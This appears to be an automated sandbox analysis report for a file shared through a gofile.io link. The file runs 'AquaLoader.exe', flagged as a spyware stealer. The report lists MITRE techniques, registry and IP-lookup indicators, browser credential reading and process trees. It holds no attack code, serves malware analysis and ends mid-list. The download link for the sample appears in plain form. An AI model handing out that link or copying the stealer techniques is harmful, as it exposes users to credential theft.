hxxps://gofile[.]io/d/5SMhnR

Analysis

max time kernel
273s
max time network
275s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
28/05/2024, 22:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/5SMhnR

Score

7^/10

execution spyware stealer

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	AquaLoader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	AquaLoader.exe

Executes dropped EXE 64 IoCs

pid	Process
3544	AquaLoader.exe
1556	fastlist.exe
2768	AquaLoader.exe
2200	AquaLoader.exe
1232	fastlist.exe
1696	fastlist.exe
4916	fastlist.exe
4152	fastlist.exe
5052	fastlist.exe
32	fastlist.exe
3152	fastlist.exe
5448	fastlist.exe
5312	fastlist.exe
5320	fastlist.exe
5308	fastlist.exe
5348	fastlist.exe
5340	fastlist.exe
5360	fastlist.exe
5368	fastlist.exe
5372	fastlist.exe
5748	fastlist.exe
4156	fastlist.exe
5304	fastlist.exe
4592	fastlist.exe
3256	fastlist.exe
5956	fastlist.exe
6000	fastlist.exe
6132	fastlist.exe
2444	fastlist.exe
5968	fastlist.exe
5644	fastlist.exe
5632	fastlist.exe
5444	fastlist.exe
1276	fastlist.exe
3316	fastlist.exe
5656	fastlist.exe
6104	fastlist.exe
5616	fastlist.exe
5392	fastlist.exe
5376	fastlist.exe
5512	fastlist.exe
5480	fastlist.exe
5124	fastlist.exe
4752	fastlist.exe
6088	fastlist.exe
2740	fastlist.exe
4400	fastlist.exe
3760	fastlist.exe
3852	fastlist.exe
4708	fastlist.exe
536	fastlist.exe
5784	fastlist.exe
224	fastlist.exe
4608	fastlist.exe
6156	fastlist.exe
6164	fastlist.exe
6180	fastlist.exe
6204	fastlist.exe
6220	fastlist.exe
6236	fastlist.exe
6252	fastlist.exe
6276	fastlist.exe
6292	fastlist.exe
6312	fastlist.exe

Loads dropped DLL 24 IoCs

pid	Process
1524	AquaLoader.exe
1524	AquaLoader.exe
1524	AquaLoader.exe
3544	AquaLoader.exe
3544	AquaLoader.exe
3544	AquaLoader.exe
2200	AquaLoader.exe
2768	AquaLoader.exe
2768	AquaLoader.exe
2768	AquaLoader.exe
2768	AquaLoader.exe
2768	AquaLoader.exe
3760	AquaLoader.exe
3760	AquaLoader.exe
3760	AquaLoader.exe
5116	AquaLoader.exe
5116	AquaLoader.exe
5116	AquaLoader.exe
7432	AquaLoader.exe
4972	AquaLoader.exe
7432	AquaLoader.exe
7432	AquaLoader.exe
7432	AquaLoader.exe
7432	AquaLoader.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 11 IoCs

Web Service

T1102

flow	ioc
115	raw.githubusercontent.com
124	raw.githubusercontent.com
125	raw.githubusercontent.com
167	raw.githubusercontent.com
171	raw.githubusercontent.com
110	raw.githubusercontent.com
111	raw.githubusercontent.com
114	raw.githubusercontent.com
177	raw.githubusercontent.com
170	raw.githubusercontent.com
178	raw.githubusercontent.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
154	ipinfo.io
95	ipinfo.io
96	ipinfo.io
153	ipinfo.io

Drops file in System32 directory 11 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
6804	powershell.exe
2020	powershell.exe
7108	powershell.exe
7580	powershell.exe
2268	powershell.exe
2876	powershell.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 14 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AquaLoader.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AquaLoader.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	AquaLoader.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2	AquaLoader.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AquaLoader.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AquaLoader.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	AquaLoader.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	AquaLoader.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	AquaLoader.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	AquaLoader.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	AquaLoader.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AquaLoader.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AquaLoader.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2	AquaLoader.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
6284	WMIC.exe
4488	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings	mspaint.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings	taskmgr.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
7416	NOTEPAD.EXE

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3144	msedge.exe
3144	msedge.exe
4804	msedge.exe
4804	msedge.exe
4392	identity_helper.exe
4392	identity_helper.exe
5792	msedge.exe
5792	msedge.exe
4504	msedge.exe
4504	msedge.exe
3544	AquaLoader.exe
3544	AquaLoader.exe
3544	AquaLoader.exe
3544	AquaLoader.exe
3544	AquaLoader.exe
3544	AquaLoader.exe
1556	fastlist.exe
1556	fastlist.exe
1696	fastlist.exe
1696	fastlist.exe
1232	fastlist.exe
1232	fastlist.exe
4152	fastlist.exe
4152	fastlist.exe
4916	fastlist.exe
4916	fastlist.exe
5448	fastlist.exe
5052	fastlist.exe
5448	fastlist.exe
5052	fastlist.exe
5348	fastlist.exe
5368	fastlist.exe
5368	fastlist.exe
5348	fastlist.exe
5320	fastlist.exe
5320	fastlist.exe
5372	fastlist.exe
5372	fastlist.exe
5748	fastlist.exe
5748	fastlist.exe
4156	fastlist.exe
4156	fastlist.exe
4592	fastlist.exe
4592	fastlist.exe
5956	fastlist.exe
5956	fastlist.exe
6132	fastlist.exe
6132	fastlist.exe
32	fastlist.exe
32	fastlist.exe
5632	fastlist.exe
5632	fastlist.exe
5444	fastlist.exe
5312	fastlist.exe
5444	fastlist.exe
5312	fastlist.exe
6236	fastlist.exe
6236	fastlist.exe
5360	fastlist.exe
5360	fastlist.exe
6368	fastlist.exe
6368	fastlist.exe
5376	fastlist.exe
5376	fastlist.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2776	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

pid	Process
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeSecurityPrivilege	1524	AquaLoader.exe
Token: SeShutdownPrivilege	3544	AquaLoader.exe
Token: SeCreatePagefilePrivilege	3544	AquaLoader.exe
Token: SeIncreaseQuotaPrivilege	964	WMIC.exe
Token: SeSecurityPrivilege	964	WMIC.exe
Token: SeTakeOwnershipPrivilege	964	WMIC.exe
Token: SeLoadDriverPrivilege	964	WMIC.exe
Token: SeSystemProfilePrivilege	964	WMIC.exe
Token: SeSystemtimePrivilege	964	WMIC.exe
Token: SeProfSingleProcessPrivilege	964	WMIC.exe
Token: SeIncBasePriorityPrivilege	964	WMIC.exe
Token: SeCreatePagefilePrivilege	964	WMIC.exe
Token: SeBackupPrivilege	964	WMIC.exe
Token: SeRestorePrivilege	964	WMIC.exe
Token: SeShutdownPrivilege	964	WMIC.exe
Token: SeDebugPrivilege	964	WMIC.exe
Token: SeSystemEnvironmentPrivilege	964	WMIC.exe
Token: SeRemoteShutdownPrivilege	964	WMIC.exe
Token: SeUndockPrivilege	964	WMIC.exe
Token: SeManageVolumePrivilege	964	WMIC.exe
Token: 33	964	WMIC.exe
Token: 34	964	WMIC.exe
Token: 35	964	WMIC.exe
Token: 36	964	WMIC.exe
Token: SeIncreaseQuotaPrivilege	964	WMIC.exe
Token: SeSecurityPrivilege	964	WMIC.exe
Token: SeTakeOwnershipPrivilege	964	WMIC.exe
Token: SeLoadDriverPrivilege	964	WMIC.exe
Token: SeSystemProfilePrivilege	964	WMIC.exe
Token: SeSystemtimePrivilege	964	WMIC.exe
Token: SeProfSingleProcessPrivilege	964	WMIC.exe
Token: SeIncBasePriorityPrivilege	964	WMIC.exe
Token: SeCreatePagefilePrivilege	964	WMIC.exe
Token: SeBackupPrivilege	964	WMIC.exe
Token: SeRestorePrivilege	964	WMIC.exe
Token: SeShutdownPrivilege	964	WMIC.exe
Token: SeDebugPrivilege	964	WMIC.exe
Token: SeSystemEnvironmentPrivilege	964	WMIC.exe
Token: SeRemoteShutdownPrivilege	964	WMIC.exe
Token: SeUndockPrivilege	964	WMIC.exe
Token: SeManageVolumePrivilege	964	WMIC.exe
Token: 33	964	WMIC.exe
Token: 34	964	WMIC.exe
Token: 35	964	WMIC.exe
Token: 36	964	WMIC.exe
Token: SeShutdownPrivilege	3544	AquaLoader.exe
Token: SeCreatePagefilePrivilege	3544	AquaLoader.exe
Token: SeIncreaseQuotaPrivilege	5316	WMIC.exe
Token: SeSecurityPrivilege	5316	WMIC.exe
Token: SeTakeOwnershipPrivilege	5316	WMIC.exe
Token: SeLoadDriverPrivilege	5316	WMIC.exe
Token: SeSystemProfilePrivilege	5316	WMIC.exe
Token: SeSystemtimePrivilege	5316	WMIC.exe
Token: SeProfSingleProcessPrivilege	5316	WMIC.exe
Token: SeIncBasePriorityPrivilege	5316	WMIC.exe
Token: SeCreatePagefilePrivilege	5316	WMIC.exe
Token: SeBackupPrivilege	5316	WMIC.exe
Token: SeRestorePrivilege	5316	WMIC.exe
Token: SeShutdownPrivilege	5316	WMIC.exe
Token: SeDebugPrivilege	5316	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5316	WMIC.exe
Token: SeRemoteShutdownPrivilege	5316	WMIC.exe
Token: SeUndockPrivilege	5316	WMIC.exe
Token: SeManageVolumePrivilege	5316	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
7404	mspaint.exe
6832	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4804 wrote to memory of 3376	4804	msedge.exe	83
PID 4804 wrote to memory of 3376	4804	msedge.exe	83
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 4712	4804	msedge.exe	84
PID 4804 wrote to memory of 3144	4804	msedge.exe	85
PID 4804 wrote to memory of 3144	4804	msedge.exe	85
PID 4804 wrote to memory of 3980	4804	msedge.exe	86
PID 4804 wrote to memory of 3980	4804	msedge.exe	86
PID 4804 wrote to memory of 3980	4804	msedge.exe	86
PID 4804 wrote to memory of 3980	4804	msedge.exe	86
PID 4804 wrote to memory of 3980	4804	msedge.exe	86
PID 4804 wrote to memory of 3980	4804	msedge.exe	86
PID 4804 wrote to memory of 3980	4804	msedge.exe	86
PID 4804 wrote to memory of 3980	4804	msedge.exe	86
PID 4804 wrote to memory of 3980	4804	msedge.exe	86
PID 4804 wrote to memory of 3980	4804	msedge.exe	86
PID 4804 wrote to memory of 3980	4804	msedge.exe	86
PID 4804 wrote to memory of 3980	4804	msedge.exe	86
PID 4804 wrote to memory of 3980	4804	msedge.exe	86
PID 4804 wrote to memory of 3980	4804	msedge.exe	86
PID 4804 wrote to memory of 3980	4804	msedge.exe	86
PID 4804 wrote to memory of 3980	4804	msedge.exe	86
PID 4804 wrote to memory of 3980	4804	msedge.exe	86
PID 4804 wrote to memory of 3980	4804	msedge.exe	86
PID 4804 wrote to memory of 3980	4804	msedge.exe	86
PID 4804 wrote to memory of 3980	4804	msedge.exe	86

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/5SMhnR
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe676e46f8,0x7ffe676e4708,0x7ffe676e4718
  2⤵
  PID:3376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,18377382822645431279,18328921605001855577,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
  2⤵
  PID:4712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,18377382822645431279,18328921605001855577,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,18377382822645431279,18328921605001855577,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2860 /prefetch:8
  2⤵
  PID:3980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,18377382822645431279,18328921605001855577,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
  2⤵
  PID:2788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,18377382822645431279,18328921605001855577,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
  2⤵
  PID:2292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,18377382822645431279,18328921605001855577,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4632 /prefetch:1
  2⤵
  PID:4600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,18377382822645431279,18328921605001855577,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:1
  2⤵
  PID:2724
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,18377382822645431279,18328921605001855577,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5464 /prefetch:8
  2⤵
  PID:2928
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,18377382822645431279,18328921605001855577,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5464 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,18377382822645431279,18328921605001855577,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3920 /prefetch:1
  2⤵
  PID:2636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,18377382822645431279,18328921605001855577,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:1
  2⤵
  PID:5304
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2092,18377382822645431279,18328921605001855577,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5660 /prefetch:8
  2⤵
  PID:5432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,18377382822645431279,18328921605001855577,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
  2⤵
  PID:5440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,18377382822645431279,18328921605001855577,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6348 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,18377382822645431279,18328921605001855577,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
  2⤵
  PID:6024
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,18377382822645431279,18328921605001855577,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3920 /prefetch:1
  2⤵
  PID:6032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
